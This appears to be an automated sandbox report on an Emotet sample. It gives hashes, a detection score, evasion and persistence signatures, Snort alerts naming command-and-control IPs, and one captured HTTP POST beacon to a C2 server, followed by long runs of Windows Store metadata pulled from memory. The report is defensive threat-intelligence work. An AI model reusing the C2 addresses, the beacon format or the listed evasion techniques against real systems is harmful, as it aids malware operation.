Analysis Report 8e1c4bf4d7639eeb253500f744cbbff5

Overview

General Information

Sample Name: 8e1c4bf4d7639eeb253500f744cbbff5 (renamed file extension from none to exe)
Analysis ID: 318782
MD5: aa4919c8592f60ac4c030c36afa15b6d
SHA1: beec382ae4c60156672b5149f4661c5c2c4a9044
SHA256: 08634d6cb66d90bc78964c9c34f929b1f545450abd316f15d002970f24a5cdf1

Most interesting Screenshot:

Detection

Emotet
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B21D0 CryptDuplicateHash,CryptDestroyHash,CryptGetHashParam,CryptEncrypt,GetProcessHeap,RtlAllocateHeap,memcpy,CryptExportKey, 2_2_023B21D0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B2590 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalFree,CryptGenKey,GetProcessHeap,HeapFree, 2_2_023B2590
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1F28 CryptDecrypt, 2_2_023B1F28
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1F10 CryptDecrypt,CryptDestroyHash,memcpy,CryptDuplicateHash,CryptVerifySignatureW,GetProcessHeap,HeapFree, 2_2_023B1F10
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_022A38A0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 2_2_023B38A0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.4:49740 -> 200.59.6.174:80
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49757 -> 59.148.253.194:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49757 -> 59.148.253.194:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 59.148.253.194 59.148.253.194
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HKBN-AS-APHongKongBroadbandNetworkLtdHK HKBN-AS-APHongKongBroadbandNetworkLtdHK
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 200.59.6.174:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------FmCOHZhPaWdjvqUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4660Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B2940 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 2_2_023B2940
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.759491776.0000028A67B6E000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1
a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1
a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1
a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects 